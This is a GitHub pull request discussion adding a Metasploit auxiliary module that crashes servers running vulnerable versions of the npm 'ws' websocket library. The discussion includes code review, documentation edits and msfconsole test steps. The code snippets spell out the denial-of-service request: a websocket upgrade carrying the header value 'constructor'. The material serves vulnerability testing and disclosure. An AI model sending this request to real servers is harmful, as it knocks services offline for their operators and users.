Adding ws DoS module #9283
Adding ws DoS module #9283
Conversation
This module verifies if ws is vulnerable to DoS by sending a request to the server containing a specific header value. ws is a npm module which handles websockets.
Adding module documentation for ws_dos.
modules/auxiliary/dos/http/ws_dos.rb
Outdated
| req = [ | ||
| "GET #{path} HTTP/1.1", | ||
| "Connection: Upgrade", | ||
| "Sec-WebSocket-Key: test", |
There was a problem hiding this comment.
Can key be randomised ? Rex::Text.rand_text_alpha(rand(10) + 5)
| 1. Start the vulnerable server using the sample server code below `node server.js` | ||
| 2. Start `msfconsole` | ||
| 3. `use auxiliary/dos/http/ws_dos` | ||
| 4. `set RHOST XXX.XXX.XXX.XXX` |
| ## Vulnerable Application | ||
|
|
||
| [ws < 1.1.5 || (2.0.0 , 3.3.1)] | ||
| (https://nodesecurity.io/advisories/550) |
There was a problem hiding this comment.
The newline and spaces are breaking the markdown.
| "Sec-WebSocket-Extensions: constructor", #Adding "constructor" as the value for this header causes the DoS | ||
| "Upgrade: websocket", | ||
| "\r\n" | ||
| ].join("\r\n"); |
There was a problem hiding this comment.
Ideally the module would use send_request_cgi from the Msf::Exploit::Remote::Http mixin, rather than using raw TCP.
Unfortunately it seems the HTTP mixin doesn't support websockets and there are no WebSocket libraries :(
Something like this would make the module much cleaner.
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s),
'headers' => {
'Connection' => 'Upgrade',
'Upgrade' => 'websocket',
'Sec-WebSocket-Key' => Rex::Text.rand_text_alpha(rand(10) + 5).to_s,
'Sec-WebSocket-Version' => '8',
'Sec-WebSocket-Extensions' => 'constructor' # Adding "constructor" as the value for this header causes the DoS
}
}, 15)There was a problem hiding this comment.
We tried to use send_request_cgi previously, however, we were unable to get the exploit to work because of the lack of WebSocket support.
1. Updated documentation 2. Made the Sec-WebSocket-Key header a random value
|
I just wanted to check with you on the status of the review of this pull request. Thank you. |
| 1. Start the vulnerable server using the sample server code below `node server.js` | ||
| 2. Start `msfconsole` | ||
| 3. `use auxiliary/dos/http/ws_dos` | ||
| 4. `set RHOST XXX.XXX.XXX.XXX` | ||
| 4. `set RHOST <IP> |
There was a problem hiding this comment.
I added the missing `
Added a missing backtick
|
Die, die! |
Release NotesThis adds a Denial of Service exploit for the 'ws' websocket library in Node.js. |
This module verifies if ws is vulnerable
to DoS by sending a request to the server
containing a specific header value.
ws is a npm module which handles websockets.
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.
Verification
List the steps needed to make sure this thing works
msfconsoleuse auxiliary/dos/http/ws_dosnpm i ws@1.1.4runin msfThis is an example server we tested against
for this vulnerability.